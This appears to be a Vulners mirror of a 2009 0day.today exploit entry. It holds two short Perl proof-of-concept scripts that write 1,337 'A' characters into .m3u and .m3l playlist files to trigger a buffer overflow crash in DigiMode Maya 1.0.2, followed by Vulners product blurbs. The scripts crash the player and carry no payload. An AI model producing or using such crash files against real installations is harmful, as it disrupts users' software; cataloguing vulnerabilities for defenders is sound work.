Lucene search
K

DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs

🗓️ 14 May 2009 00:00:00Reported by SirGodType 
zdt
 zdt
🔗 0day.today👁 27 Views

DigiMode Maya 1.0.2 Buffer Overflow PoCs for .m3u and .m3l file

Code
============================================================
DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs
============================================================



#####################################################################################################
#                    DigiMode Maya 1.0.2 (.M3U File) Local Buffer Overflow PoC
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";

#####################################################################################################
#                    DigiMode Maya 1.0.2 (.M3L File) Local Buffer Overflow PoC
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3l";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";



#  0day.today [2018-01-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 May 2009 00:00Current
7High risk
Vulners AI Score7
27